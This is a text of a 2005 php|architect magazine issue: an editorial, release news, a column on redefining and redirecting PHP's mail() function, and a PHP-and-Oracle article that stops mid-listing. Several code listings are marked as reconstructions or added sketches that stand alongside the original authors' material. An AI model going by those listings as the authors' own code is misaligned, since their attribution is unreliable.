CONTENTS

EDITORIAL

php|news

TIPS & TRICKS
mail() Hacks
Redefining and Redirecting mail()
by BEN RAMSEY

PHP & Oracle
Analysis of this recently announced partnership and its benefits to the web developer community
by ROBERT MARK

Job Management with PHP & Cron
Discussion on building an admin page to create and monitor a job queue with near-real-time status updates
by MIKE DeWOLFE

Flying with Seagull
A step-by-step guide for setting up an example module
by WILLIAM ZELLER and WERNER M. KRAUSS

User Management with Active Directory
Accessing, inserting or altering objects within the AD structure of Microsoft Windows Server 2003
by CHAD R. SMITH

TEST PATTERN
To Test is to Fake
How to properly test the whole system
by MARCUS BAKER

SECURITY CORNER
Cross Site Scripting
by CHRIS SHIFLETT

SPECIAL FEATURE
Conference Coverage
Review and analysis of the php|works and web|works conference held in Toronto, September 14-16, 2005
by PETER B. MacINTYRE

exit(0);
It’s a Bird! It’s a Plane! It’s FUD!
by MARCO TABINI

Download this month’s code at: http://www.phparch.com/code/
WRITE FOR US!
If you want to bring a php-related topic to the attention of the professional php community, whether it is personal research, company software, or anything else, why not write an article for php|architect? If you would like to contribute, contact us and one of our editors will be happy to help you hone your idea and turn it into a beautiful article for our magazine. Visit www.phparch.com/writeforus.php or contact our editorial team at [email protected] and get started!
EDITORIAL
THE ENTERPRISE AWAKENS

Those of us in the know have been aware of PHP’s readiness to take on the “enterprise” for quite a while now. We’ve built serious applications, we’ve processed millions of dollars’ worth of transactions with our favorite language, and we’ve even been heard extolling PHP’s virtues before management-types.

An all-too-common scene in the office, though, is PHP sneaking in through the back door. Upper- (or perhaps mid-) management has traditionally favored heavily-marketed and “proven” products over non-orthodox, community-built technologies. I once worked for a CTO who (as the joke went, anyway) would build the next project on whatever platform was advertised on the last page of his business magazines. Unfortunately, many of the developers (myself included) were not convinced that the joke was only that: a joke.

Despite (or perhaps thanks to) this lack of technological vision, our “little secret” language has been making huge inroads into the enterprise lately. We have a few key players to thank for this, especially Zend.

Zend’s involvement with PHP is obvious; they are “The PHP Company” after all. They’ve recently made a few strategic moves that are helping to propel PHP into the minds of corporations, IT managers, CTOs, and other business-types. As far as I’m concerned, they’ve made four key moves to promote PHP in this way.

The first two are related (and the first is partially covered in this issue): Zend Core for Oracle, and Zend Core for IBM. Just as large businesses dislike non-mainstream software, they are often seen shunning open-source database platforms. With Zend actively working with both Oracle and IBM’s DB2, the PHP database taboo has been lifted. Many corporations have already deployed systems on Oracle or DB2, and (correctly) see no need to add yet another database platform to their clusters.
(IBM has returned the favor by participating in PHP development; see PDO_odbc (http://pecl.php.net/pdo_odbc), the PDO documentation (http://php.net/pdo) and SDO (http://pecl.php.net/sdo).)

The next move on Zend’s part, of enterprise significance, is Marc Andreessen’s recent joining of Zend’s board of directors. Marc seems to have wholeheartedly accepted PHP as a legitimate platform for serious web applications, facing the competition of coffee-based languages head on: “PHP is to 2005 what Java was to 1995.” Those are strong words from a guy with both serious technology and business credibility.

The last of Zend’s recent moves that I find significant is the recent announcement of the PHP Collaboration Project, including the Zend Framework. This one has three major enterprise-friendly parts (again, in my opinion): engagement with the Eclipse Foundation, a standard development framework for PHP, and corporation-friendly licensing and license-auditing of the code in the framework.

There is little information available on Zend’s work with Eclipse, but I’m eager to find out more, as I’m personally an active PHP Eclipse user, and I long for certain features of Zend Studio (especially debugging). Just as with the database problem above, many companies already have Eclipse deployed for their (especially Java-) developers.

The framework itself (in which I’ve been invited to participate, but as yet have only lurked on the mailing list) will hopefully breed a new generation of PHP applications that can avoid the menial task of form handling (as one example). See also this month’s continuation of the article on building applications with the Seagull framework (which exists and is ready to use, today).

The licensing feature of the framework is particularly beneficial to enterprises that wish to re-sell applications developed in PHP.
The PHP project has been burned by the GPL before (which is why you won’t find any GPL-licensed extensions in PECL), and even for code licensed under a BSDish (e.g. PHP) license, there’s always the risk, without some sort of auditing, that code has been stolen from an unknown source. Zend provides this auditing with their framework.

All of this to say: not only is PHP ready for the enterprise, but the enterprise is starting to awaken to this fact. Kudos to the key players for making this happen!
Volume 4 - Issue 11

Publisher
Marco Tabini

Editor-in-Chief
Sean Coates

Editorial Team
Arbi Arzoumani
Peter MacIntyre
Eddie Peloke

Graphics & Layout
Aleksandar Ilievski

Managing Editor
Emanuela Corso

News Editor
Leslie Hill
[email protected]

Authors
Marcus Baker, Werner M. Krauß, Peter B. MacIntyre, Robert Mark, Ben Ramsey, Chris Shiflett, Chad R. Smith, Mike DeWolfe, William Zeller

php|architect (ISSN 1709-7169) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box 54526, 1771 Avenue Road, Toronto, ON M5M 4N5, Canada.

Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards of use of the information contained herein or in all associated material.

php|architect, php|a, the php|architect logo, Marco Tabini & Associates, Inc. and the Mta Logo are trademarks of Marco Tabini & Associates, Inc.
php.net announces the release of PHP 4.4.1.

“PHP 4.4.1 is now available for download. This version is a maintenance release that contains numerous bug fixes, including a number of security fixes related to the overwriting of the GLOBALS array. All users of PHP 4.3 and 4.4 are encouraged to upgrade to this version. Some of the changes in PHP 4.4.1 include:
• Added missing safe_mode checks for image* functions and cURL.
• Added missing safe_mode/open_basedir checks for file uploads.
• Fixed a memory corruption bug regarding included files.
• Fixed possible INI setting leak via virtual() in Apache 2 sapi.
• Fixed possible crash and/or memory corruption in import_request_variables().
• Fixed potential GLOBALS overwrite via import_request_variables().
• Fixed possible GLOBALS variable override when register_globals are ON.
• Fixed possible register_globals toggle via parse_str().”

Get your hands on the latest release at php.net!
phpBB 2.0.18
The phpBB Group is pleased to announce the release of phpBB 2.0.18, “The Halloween Special” release. This is a major update to the 2.0.x codebase and includes fixes for numerous bugs reported by users to our Bug Tracker, as well as updates to those issues identified by the recent security audit of the code and a couple of security issues reported to us. In addition we have backported a further feature from our “Olympus” codebase to change the way automatic logins are handled. We would like to thank all of those who took part in the security audit of the code for their work.

As with all new releases we urge you to update as soon as possible. You can, of course, find this download available on our downloads page. As per usual, four packages are available to simplify your update.

For more information visit: http://www.phpbb.com/
FUDforum 2.7.3 Released
Ilia.ws announces: After nearly 2 months of testing and development, I am happy to announce the release of FUDforum 2.7.3, the new stable version. This is primarily a bug-fix release and all users, especially those of the 2.7 series, are encouraged to upgrade to it. As far as the changes go, this version is virtually identical to the prior release candidate. The one major addition was the integration of the Indonesian translation, which now makes the forum available in a whopping 26 languages, 2 more than in the prior stable release. Get all the latest info from ilia.ws.
symfony 0.4.1
symfony-project.com announces the release of version 0.4.1. What is symfony? The site describes it as professional web tools for lazy folks:

Based on the best practices of web development, thoroughly tried on several active websites, symfony aims to speed up the creation and maintenance of web applications, and to replace the repetitive coding tasks by power, control and pleasure.

If you have been looking for a Rails/Django-like framework for PHP projects with features such as:
• simple templating and helpers
• cache management
• multiple environments support
• deployment management
• scaffolding
• smart URLs
• multilingual and I18N support
• object model and MVC separation
• Ajax support
...where all elements work seamlessly together, then symfony is made for you.

Check out the latest version of symfony at symfony-project.com.
PHP Québec 2006: call for speakers
PHP Québec is pleased to announce the 2006 PHP Québec conference, which will be held between March 29th and 31st, 2006. We are looking for the best speakers, willing to share their experience and skills with professional PHP developers from eastern Canada and the USA.

PHP Québec 2006 features 3 distinct tracks:
• Technical PHP, covering PHP techniques in deep detail.
• Professional Development, featuring tools and development methodologies to increase productivity.
• Databases, covering the different databases that can be used with PHP.

Sessions will be held in French or English. For more information, see the PHP Québec website: conf.phpquebec.com/en/conf2006/
php|architect Releases New Design Patterns Book

We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the latest release in our Nanobook series.

You have probably heard a lot about Design Patterns, a technique that helps you design rock-solid solutions to practical problems that programmers everywhere encounter in their day-to-day work. Even though there has been a lot of buzz, however, no-one has yet come up with a comprehensive resource on design patterns for PHP developers, until today.

Author Jason E. Sweat’s book php|architect’s Guide to PHP Design Patterns is the first comprehensive guide to design patterns designed specifically for the PHP developer. This book includes coverage of 16 design patterns with a specific eye to their applications in PHP when building complex web applications, both in PHP 4 and PHP 5 (where appropriate, sample code for both versions of the language is provided).

For more information, visit http://www.phparch.com/shop_product.php?itemid=96.
Volume 4 Issue 11 • php|architect •8
Check out some of the hottest new releases from PEAR.

ScriptReorganizer 0.3.0
Library/Tool focusing exclusively on the file size aspect of PHP script optimization.

HTTP_Request 1.3.0
Provides an easy way to perform HTTP requests.

Calendar 0.5.3
Calendar provides an API for building Calendar data structures. Using the simple iterator and its “query” API, a user interface can easily be built on top of the calendar data structure, at the same time easily connecting it to some kind of underlying data store, where “event” information is being held. It provides different calculation “engines”, the default being based on Unix timestamps (offering fastest performance), with an alternative using PEAR::Date which extends the calendar past the limitations of Unix timestamps. Other engines can be implemented for other types of calendars (e.g. a Chinese Calendar based on lunar cycles).

Benchmark 1.2.4
Framework to benchmark PHP scripts or function calls.

Text_Wiki_BBCode 0.0.2
Parses BBCode mark-up to tokenize the text for Text_Wiki rendering (Xhtml, plain, Latex) or for conversions using the existing renderers (wiki).

HTML_Template_Sigma 1.1.4
HTML_Template_Sigma implements Integrated Templates API designed by Ulf Wendel.

PEAR_PackageFileManager 1.6.0a4
PEAR_PackageFileManager takes an existing package.xml file and updates it with a new filelist and changelog.

PEAR 1.4.4
PEAR Base System

Text_Wiki 1.0.2
Abstracts parsing and rendering rules for any markup as Wiki or BBCode in structured plain text.

PEAR_RemoteInstaller 0.2.0
PEAR Remote installation plugin through FTP

Looking for a new PHP Extension? Check out some of the latest offerings from PECL.

expect 0.1

pecl_http 0.17.0
- Extended HTTP Support
- Building absolute URLs
- RFC compliant HTTP redirects
- RFC compliant HTTP date handling
- Parsing of HTTP headers and messages
- Caching by “Last-Modified” and/or ETag (with ‘on the fly’ option for ETag generation from buffered output)
- Sending data/files/streams with (multiple) ranges support
- Negotiating user preferred language/charset
- Convenient request functionality built upon libcurl
- PHP5 classes: HttpUtil, HttpResponse (PHP-5.1), HttpRequest, HttpRequestPool, HttpMessage

PDO_SQLITE 1.0RC2
This extension provides an SQLite v3 driver for PDO. SQLite V3 is NOT compatible with the bundled SQLite 2 in PHP 5, but is a significant step forward, featuring complete utf-8 support, native support for blobs, native support for prepared statements with bound parameters and improved concurrency.

PDO_PGSQL 1.0RC2
This extension provides a PostgreSQL driver for PDO.

PDO_ODBC 1.0RC2
This extension provides an ODBC v3 driver for PDO. It supports unixODBC and IBM DB2 libraries, and will support more in future releases.

PDO_OCI 1.0RC2
This extension provides an Oracle driver for PDO.
TIPS & TRICKS

mail() Hacks

How do you send e-mail on a server in which there is no mail server installed? How do you redirect e-mail messages in a testing environment so they don’t go to your users? This edition of Tips & Tricks addresses these two questions, highlighting some useful tricks to redefine or redirect mail().

by BEN RAMSEY

PHP provides an awesome built-in feature with the mail() function. I refer to it as “awesome” because I originally came to this language from the background of ASP and VBScript, and to successfully send an e-mail message from an ASP script, one had to purchase a third-party COM object and successfully install and register the object on a Windows server. PHP has mail capabilities built right into the language, providing developers with a powerful and easy way to send e-mail.

Sometimes, however, whether for purposes of security (in which the server doesn’t have access to a local mail server) or debugging (mail should be trapped and not sent to users), it becomes necessary to redefine the mail() function, or redirect it. In this edition of Tips & Tricks, we’ll explore how to do both.
CODE DIRECTORY: hacks
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/262

Redefining mail()

There might be times in which server administrators do not wish to provide access to mail functionality. For example, they may be unwilling to install sendmail, postfix, or any other mail server. There are valid security reasons for disallowing mail servers, such as the fear of a Web server being used as a spam relay, but this lack of functionality can put a damper on Web application features. Furthermore, while applications can be written in such a way as to get around this limitation (e.g. using sockets and SMTP), there are many third-party applications and tools that rely on PHP’s mail() function, and it is far too time consuming to rework these applications to use your own mail function. Thus, for full compatibility, it becomes necessary to hack away at PHP’s mail() function and create your own. As difficult as this sounds, it’s actually quite simple to do.

To completely redefine the mail() function, it is necessary to recompile PHP without support for the function. Afterwards, we’ll create a new mail() function using PHP, and your applications will be none the wiser.

First, to compile PHP without mail(), run the configure command as normal, including all desired parameters. Then, before running make, edit main/php_config.h. Find the line that reads:

#define HAVE_SENDMAIL 1

Comment out this line, so that it now reads:

/* #define HAVE_SENDMAIL 1 */
Now, run make and make install as usual. This will essentially disable the mail() function, and it will no longer be available to your scripts. So, our next step is to create a mail() function at the application level. Listing 1 shows one such example mail() function using the PEAR::Mail package. This function implements exactly the same parameters as the native PHP mail() function to ensure compatibility with any applications that require the use of mail(); it does not use the $additional_parameters parameter, since that is primarily used to pass additional arguments to the sendmail (or other mailer) binary. This new function should also behave in exactly the same way as the native function, and all parameters passed to it should follow the rules for mail() as defined in the PHP manual.

NOTE: Using this method, you cannot simply create a new mail() function using the PEAR::Mail “mail” driver, as this driver also utilizes PHP’s built-in mail() function to send mail. Thus, redefining the mail() function to use the PEAR::Mail “smtp” driver should also work for any applications that use PEAR::Mail with the mail driver. Using PEAR::Mail with the sendmail driver will not work if sendmail is not available on the system.

Now that we have defined a new mail() function, we need to make it accessible to the applications that require it. The quickest and easiest way to do this is to use the auto_prepend_file setting in php.ini:

auto_prepend_file = /path/to/new_mail.php

You may also set this in your Apache httpd.conf or .htaccess file:

php_value auto_prepend_file /path/to/new_mail.php

Now, we have a mail() function that will perform similarly to the built-in function, and all PHP applications on the system have access to use it. Keep in mind that other PHP mailing libraries could be used; you are not limited to PEAR::Mail.

Redirecting mail()

At times it is preferable to turn off mail functionality altogether without recompiling PHP. This includes applications that are running on testing servers and need to use mail() for debugging purposes, but should not send any actual mail messages (or should send messages, but only to the developers). In cases such as these, it is possible to redirect mail messages sent through mail() by modifying the php.ini sendmail_path value.

Modifying sendmail_path is a simple task. The complexities lie in the script to which all mail is redirected. This script may be as simple as directing all mail to a log file or redirecting it to the project developers, or it may be as complex as implementing a full-scale mail solution using a PHP command-line interface (CLI) script to both send mail, as illustrated in Listing 1, and log everything. We’ll examine all of these options.

If the goal is to temporarily turn off mail and redirect it to a log file, simply create a script named logmail, set the permissions level to 755 (chmod 755 logmail), and put the following line in the script:
cat >> /tmp/logmail.log
Then, set sendmail_path in php.ini to /path/to/logmail. Don’t forget to restart your web server. Now, all e-mail sent by applications will be stored in /tmp/logmail.log rather than reaching the recipient in the To header.

NOTE: The sendmail_path directive may be set only in php.ini or Apache’s httpd.conf. It cannot be set from an .htaccess file.

There may be times, however, when properly testing an application means that all e-mail messages generated by the application must be sent somewhere, but they shouldn’t go to any real users. Thus, we need to trap the mail, which is another fairly simple task. Create a script named trapmail, set the permissions level, again, to 755, and place the following in the script (replacing [email protected] with your choice of email address, of course):

formail -R cc X-original-cc \
  -R to X-original-to \
  -R bcc X-original-bcc \
  -f -A"To: [email protected]" \
| /usr/sbin/sendmail -t -i
Then, as before, set the sendmail_path directive to /path/to/trapmail. This will redirect all e-mail messages sent by the application to [email protected], and the original To, Cc, and Bcc headers will be rewritten to X-original-to, X-original-cc, and X-original-bcc respectively.

The trapmail script needs sendmail to be available on the system. sendmail is not strictly required for this kind of redirection, however, since it is possible to create a PHP CLI script that combines the redirecting with code from the custom mail() script of Listing 1 to redirect and log any messages sent by a PHP application. Listing 2 gives a glimpse into how this is possible.

I would save the code in Listing 2 to a file such as /usr/local/bin/php_mailer and set its permissions to 755. Then, I would implement some form of logging, perhaps using PHP 5’s file_put_contents(), along with a mailer package to send mail to either the intended recipient (on a production server) or the developers (on a testing server). Also, notice that the mail is received on standard input in Listing 2. The message is being received in exactly the same format that sendmail would receive it. Thus, this script must parse the received message, extract the headers and body (we have already done this), and send them to PEAR::Mail in the format it expects. Finally, the sendmail_path directive must be set to /usr/local/bin/php_mailer to make use of it.

These suggestions are simple, yet effective, ways to send e-mail when your server can’t support PHP’s native mail() function, or to redirect messages during development or testing. I hope you can see how these methods are versatile and can be extended to implement some rather complex mailing functionality.

I’d like to thank Sean Coates and Davey Shafik, who allowed me the use of content from their blogs to make this column possible.
If you have a tip and/or trick that you’d like to see published here, send it to [email protected], and, if I use it, you’ll receive a free digital subscription to php|architect. Until next time, happy coding!
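LISTING 1

<?php
/* The opening lines of this listing did not survive. The require_once call,
   the function signature, the $from default and the 'host' key below are
   reconstructed assumptions, not the author's original code. */
require_once 'Mail.php';

function mail($to, $subject, $message, $additional_headers = null, $additional_parameters = null)
{
    /* Assumed default sender, read from the sendmail_from INI setting */
    $from = ini_get('sendmail_from');

    /* SMTP connection settings passed to PEAR::Mail */
    $smtp_params = array(
        'host'     => 'mail.example.org',
        'port'     => 25,
        'auth'     => TRUE,
        'username' => 'smtp_username',
        'password' => 'smtp_password',
        'persist'  => FALSE
    );

    /* Parse headers */
    $headers = array();
    if (!is_null($additional_headers) && is_string($additional_headers)) {
        $tmp_headers = explode("\r\n", $additional_headers);
        foreach ($tmp_headers as $header) {
            /* Split on the first colon only, so values containing ':' survive */
            $parts = explode(':', $header, 2);
            if (count($parts) == 2) {
                $headers[trim($parts[0])] = trim($parts[1]);
            }
        }
    }

    /* Set default headers, if not present */
    $headers['Subject'] = $subject;
    if (!isset($headers['To'])) $headers['To'] = $to;
    if (!isset($headers['Date'])) $headers['Date'] = date('r');
    if (!isset($headers['From'])) $headers['From'] = $from;

    /* Send the mail message */
    $mail_object =& Mail::factory('smtp', $smtp_params);
    $e = $mail_object->send($to, $headers, $message);
    if (PEAR::isError($e)) {
        exit($e->getMessage());
    }

    /* The native mail() returns TRUE on success */
    return TRUE;
}
?>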
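The header handling in Listing 1 can be tried without an SMTP server or PEAR::Mail installed. The sketch below pulls that step into a stand-alone function. Note that build_mail_headers() is a hypothetical name that does not come from PEAR::Mail or from the original listing, and the addresses are placeholders. It splits each header line on the first colon only, and it accepts both CRLF and bare LF between lines, which is an assumption about what callers may pass in.

```php
<?php
/**
 * Hypothetical helper (not part of PEAR::Mail): turn the arguments of a
 * mail() call into the associative header array a mailer package expects.
 */
function build_mail_headers($to, $subject, $additional_headers = null, $from = '')
{
    $headers = array();

    if (is_string($additional_headers) && $additional_headers !== '') {
        // Accept both CRLF and bare LF between header lines.
        foreach (preg_split('/\r?\n/', $additional_headers) as $line) {
            // Split on the first colon only, so "X-Sent: 12:30:00" stays whole.
            $pair = explode(':', $line, 2);
            if (count($pair) === 2) {
                $headers[trim($pair[0])] = trim($pair[1]);
            }
        }
    }

    // Subject always comes from the argument; the rest are only defaults.
    $headers['Subject'] = $subject;
    if (!isset($headers['To'])) {
        $headers['To'] = $to;
    }
    if (!isset($headers['Date'])) {
        $headers['Date'] = date('r');
    }
    if (!isset($headers['From'])) {
        $headers['From'] = $from;
    }
    return $headers;
}

// Example call with placeholder addresses.
$example = build_mail_headers(
    'user@example.org',
    'Test message',
    "From: app@example.org\r\nX-Sent: 12:30:00"
);
print_r($example);
```

Keeping this step separate from the sending code makes it easy to check how a third-party application's header string will be interpreted before any mail leaves the server.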
LISTING 2
#!/usr/local/bin/php
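Only the first line of Listing 2 survives here. As a rough sketch of the pieces such a CLI mailer might contain, and not a reconstruction of the author's listing, the functions below split a raw message into headers and body, log it with file_put_contents(), and rewrite the recipients in the same spirit as the trapmail script. All function names, the log file path and the trap address are assumptions made for illustration.

```php
<?php
// Hypothetical building blocks for a sendmail_path replacement script.

/** Split a raw message, as sendmail would receive it, into headers and body. */
function split_raw_message($raw)
{
    // Normalise line endings so the blank-line separator is easy to find.
    $raw = str_replace("\r\n", "\n", $raw);
    $parts = explode("\n\n", $raw, 2);
    $body = isset($parts[1]) ? $parts[1] : '';

    $headers = array();
    $last = null;
    foreach (explode("\n", $parts[0]) as $line) {
        if ($line === '') {
            continue;
        }
        // A line starting with whitespace continues the previous header.
        if ($last !== null && ($line[0] === ' ' || $line[0] === "\t")) {
            $headers[$last] .= ' ' . trim($line);
            continue;
        }
        $pair = explode(':', $line, 2);
        if (count($pair) === 2) {
            $last = trim($pair[0]);
            $headers[$last] = trim($pair[1]);
        }
    }
    return array($headers, $body);
}

/** Rename To, Cc and Bcc to X-original-* and address the message to $trap. */
function trap_recipients($headers, $trap)
{
    $out = array();
    foreach ($headers as $name => $value) {
        $lower = strtolower($name);
        if ($lower === 'to' || $lower === 'cc' || $lower === 'bcc') {
            $out['X-original-' . $lower] = $value;
        } else {
            $out[$name] = $value;
        }
    }
    $out['To'] = $trap;
    return $out;
}

/** Append the raw message to a log file; returns TRUE on success. */
function log_raw_message($logfile, $raw)
{
    $entry = '--- ' . date('r') . " ---\n" . $raw . "\n";
    return file_put_contents($logfile, $entry, FILE_APPEND | LOCK_EX) !== false;
}
```

In an actual script, the raw message would come from file_get_contents('php://stdin'), and the resulting headers and body would be handed to a mailer such as the PEAR::Mail smtp driver used in Listing 1. This simple parser keeps only the last value of a repeated header, which is a limitation worth noting if headers such as Received matter to you.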
BEN RAMSEY is a Technology Manager for Hands On Network in Atlanta, Georgia. He is an author, Principal member of the PHP Security Consortium, and Zend Certified Engineer. Ben lives just north of Atlanta with his wife Liz and dog Ashley. You may contact him at [email protected] or read his blog at http://benramsey.com/.
Tips & Tricks
FEATURE
PHP & Oracle
Recently, there has been a lot of attention paid to the partnership between Zend Technologies and Oracle. This article examines the benefits that this partnership offers web developers.
by ROBERT MARK
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/263

It does sound strange, doesn’t it? The marriage of PHP and Oracle is a little like the odd couple. One side is bred of the free-spirited open source community while the other springs from the requirements of a strict corporate culture. In fact, when you put the two together they complement each other very nicely, unlike the two fellows of ’70s TV fame. PHP enjoys the benefit of a huge community of developers who create numerous quality open source components, while Oracle is a proven enterprise database management system that offers a suite of applications that handle performance, scalability, and security.

Over the past couple of years, the relationship between Oracle and PHP has grown closer. Both are major players in their respective milieus and, in spite of their differing backgrounds, the two have found themselves sharing the spotlight recently as the partnership between Zend Technologies and Oracle has produced some tangible results. On October 11, 2005, Oracle and Zend announced that the new Zend Core for Oracle had been released for general distribution.

In the past, in order to get PHP working with Oracle you had to download PHP, Apache, and Oracle Instant Client separately. You then had to create or modify a makefile, compile, link the components, and configure each one once it was installed. Zend Core was built to deliver a tested, high-performance OCI8 driver that integrates with the Oracle 10g client libraries. It bundles together all of the install code for both PHP 5 and Oracle, which makes it a one-stop shop for PHP and Oracle installations. The new Zend Core is configurable from a single web-based interface and is available as a free download from Zend.com.

Originally, the PHP/Oracle APIs were quite limited. The original set of APIs for connecting PHP and Oracle were called the ORA functions. These ORA functions are now deprecated and are no longer bundled with PHP. They were useful for simple insert and select statements, but accessing stored procedures was problematic because this API lacked support for BLOBs, CLOBs and variable binding.

The OCI8 functions, introduced in later versions of PHP 4, require Oracle 8 or greater and run on either Windows or Linux. These functions give more options for connecting to an Oracle database by allowing the programmer to specify new or persistent connections for each database call from the web server. Large object support was introduced to make use of Oracle’s LOB data types, and variable binding was introduced to allow for execution of more complex stored procedures.
While the OCI8 functions offered greater flexibility when accessing Oracle, support was minimal at best as PHP developers generally focused on interfacing with MySQL databases, which were far more commonly paired with PHP. For precisely this reason, few major web sites used PHP and Oracle together. Companies and organizations that use Oracle may not have wanted to explore newer avenues of web development when PHP was felt to be an unproven method for accessing Oracle data. Since its inception in 1995, web development with Oracle has generally been associated with Java. Times have changed and it is now recognized that PHP and Oracle complement each other quite well. This article will explore some ways in which Oracle can benefit PHP development.
Use database caching or data caching

Data caching is one of the best strategies for improving web application performance. It refers to identifying frequently used information and storing it in an easily accessible place. Usually this means that the query or data set will be loaded into memory. The best way to handle data from a database is to design your application so that it makes as few database calls as possible, because every call adds load on the server and slows your applications down.

The illustration in Figure 1 shows how database caching works. If a dataset is specified as being cached, it is loaded into memory. If a query needs to access the dataset, it can pull it directly from memory. If the dataset has different requirements, such as customized parameters, the next step is to look into the indexing on a table. If the dataset still requires customization then the table must be accessed.

FIGURE 1

Depending on your business rules, if the data that you are requesting needs to be up to the minute and could change at any second, then you will need to call the database for each and every page request. Often multiple calls will be necessary. There are many circumstances, though, where a database call is unnecessary and the extra overhead can be avoided by simply caching a data set.

Of course, the performance of a database management system depends a great deal on the experience and ability of the database designer, programmer and administrator. Oracle is very good at handling large numbers of requests, but there is no substitute for good database design. As an example, some of the applications that I have had a hand in writing were required to access database tables with hundreds of thousands of rows. Without proper indexing and data caching, the queries that fetched the data for a page would time out before they finished processing. A single page view could involve several such large database calls.

One page that I created with my development team for a web portal required that each person see a customized page after logging in. This meant that we would first have to search for a username-password combination within a table that contained nearly half a million rows. This would return a login confirmation and a unique identifier. We would then query another table to find a list of that person’s interests; another query fetched news stories related to a particular school, and yet another displayed academic events based on the interests of that individual. All of the queries were contained in stored procedures that used complex SQL statements to present the user with a personalized home page based on a profile that was created from the available data. In order to reduce the amount of time it took to return data, several queries were cached, that is, they were stored in memory for ready access. As a result, displaying each customized home page now takes a fraction of a second.
Data caching reduces the number and types of database queries that may be required to display a page. These features are not unreasonable in a world of Amazon.com type customization where each user is presented with a customized web interface but they place a huge burden on any database. Of course, all of this depends upon the business rules and the requirements of the project.
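The caching idea described above can be sketched in a few lines of PHP. This is only an illustration under stated assumptions: the QueryCache class, the cache key and the closure that stands in for the database call are all hypothetical, and the timestamps are passed in by hand so that the expiry behaviour is easy to follow.

```php
<?php
// Hypothetical helper: keeps query results in memory for a limited time.
// Nothing here is Oracle-specific; $loader stands in for the real database call.
class QueryCache
{
    private $entries = array();   // key => array('expires' => int, 'rows' => mixed)
    private $ttl;

    public function __construct($ttlSeconds)
    {
        $this->ttl = $ttlSeconds;
    }

    // Return the cached rows for $key, calling $loader only on a miss or after expiry.
    public function fetch($key, $loader, $now = null)
    {
        $now = ($now === null) ? time() : $now;
        if (isset($this->entries[$key]) && $this->entries[$key]['expires'] > $now) {
            return $this->entries[$key]['rows'];
        }
        $rows = call_user_func($loader);
        $this->entries[$key] = array('expires' => $now + $this->ttl, 'rows' => $rows);
        return $rows;
    }
}

// Usage: the closure is a stand-in for a stored procedure call.
$dbCalls = 0;
$loadInterests = function () use (&$dbCalls) {
    $dbCalls++;
    return array('rowing', 'chemistry');
};

$cache  = new QueryCache(300);                                  // keep results for five minutes
$first  = $cache->fetch('interests:42', $loadInterests, 1000);  // miss: calls the loader
$second = $cache->fetch('interests:42', $loadInterests, 1100);  // hit: served from memory
$third  = $cache->fetch('interests:42', $loadInterests, 1400);  // expired: calls the loader again
```

Because each PHP request starts with empty memory, an array like this only saves repeated calls within a single request. To share results between requests, the entries would have to live in shared storage or in the database server's own cache, which is the arrangement the article describes.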
PDO vs. OCI and ADODB (PHP 5 Data Objects vs. Oracle Call Interface and ADOdb)

The method for accessing data from Oracle through PHP has undergone several changes over the years. One thing that is notable about PHP is that because its development tends to respond to the needs of the present, there seems to be less regard for future planning. This is one reason why there are so many separate database driver functions available in PHP. Each set of driver functions corresponds to a particular database platform, although much of the required functionality remains the same from platform to platform. Why do we need a separate API for MySQL, Postgres and Oracle? That’s a good question. As PHP was being developed, the syntax and functionality for database access was created by separate groups of PHP developers, which resulted in different APIs for each database. This means that certain features that are available for developing in a MySQL environment will not be available to PHP developers using an Oracle database, and vice versa.

This is why the PHP community is developing a new, reengineered API for all database calls. PHP Data Objects (PDO) is the new, more consistent database API that is currently still in development but is due to be included in the PHP 5.1 release. Some of the features, as they relate to Oracle, include a refactored Oracle driver, statements with bound parameters, transactions, large objects and better error handling. Most importantly, PDO will provide a common interface for all database access. By abstracting the database layer you can use the same API for any database.

The concept is similar to that of any database abstraction layer such as the ADOdb Database Abstraction Library (http://adodb.sourceforge.net). ADOdb provides a unified API for accessing SQL databases. It is fairly easy to learn; however, it does not completely succeed in abstracting Oracle database access because some Oracle features are not available in other databases. Specifically, Oracle uses a data type called a ref cursor, which is basically a pointer to a recordset. Because Oracle is the only database that uses this data type, there is a function in ADOdb that is unique to Oracle called ExecuteCursor. The ADOdb driver has also been proven to be faster in benchmarks performed by phpLense (http://phplense.com/lens/adodb/).

A database abstraction layer makes moving from one database to another much easier, although such a move is not something to be taken lightly. Because much of the business logic is tied to the database you would be well advised to commit to one. As you can see in the example in Listing 1, the syntax for calling stored procedures differs between Oracle and MySQL. Calls to stored procedures in Oracle are invoked with “BEGIN” while MySQL’s stored procedures are executed with “CALL”. This is one of the weaknesses of using a database abstraction layer. If the purpose of an abstraction layer is to facilitate code portability, then it would make sense to standardize the procedure calls. Using strictly entry-level ANSI SQL in the PDO prepare statement would allow for this because all databases understand this standard, but calls to stored procedures are database specific. A database abstraction layer’s main strength is simplifying and reducing the amount of code it takes to complete the same task.

If you can’t wait for PHP 5.1 to be released then ADOdb is your best bet. You should be warned that if portability is your primary concern then you’ll have a tough time trying to standardize complex SQL queries. Because ADOdb in some cases uses statements that apply only to Oracle and functionality that is unique to certain databases, portability across database platforms is simply not possible, or at least not practical.

LISTING 2

--set up database table for images
CREATE TABLE DB_IMAGE_LIBRARY(
  IMG_ID         NUMBER,
  CAT_ID         VARCHAR2(2 BYTE),
  FILE_NAME      VARCHAR2(50 BYTE),
  IMG_SIZE       NUMBER,            --SIZE is a reserved word in Oracle
  MIME_TYPE      VARCHAR2(50 BYTE),
  IMG_BIN        BLOB,
  WIDTH          NUMBER,
  HEIGHT         NUMBER,
  SHORT_DESC     VARCHAR2(255 BYTE),
  DATE_ADDED     DATE DEFAULT SYSDATE,
  DATE_MODIFIED  DATE DEFAULT SYSDATE,
  C_OPERATOR_ID  VARCHAR2(10 BYTE)
)
STORAGE (initial 50K next 50K pctincrease 0)
TABLESPACE DB_TABLE_DATA
LOB (IMG_BIN) STORE AS (
  TABLESPACE IMAGE_DATA
  STORAGE (initial 100K next 100K pctincrease 0)
);

--Create a package to retrieve image data
CREATE OR REPLACE PACKAGE PKG_IMAGE_MGMT AS
  TYPE my_ref_cursor IS REF CURSOR;
  PROCEDURE SP_GET_IMAGE (p_img_id IN NUMBER, my_cursor OUT my_ref_cursor);
END;
/
CREATE OR REPLACE PACKAGE BODY PKG_IMAGE_MGMT AS
  --the parameter is named p_img_id so that it cannot be mistaken
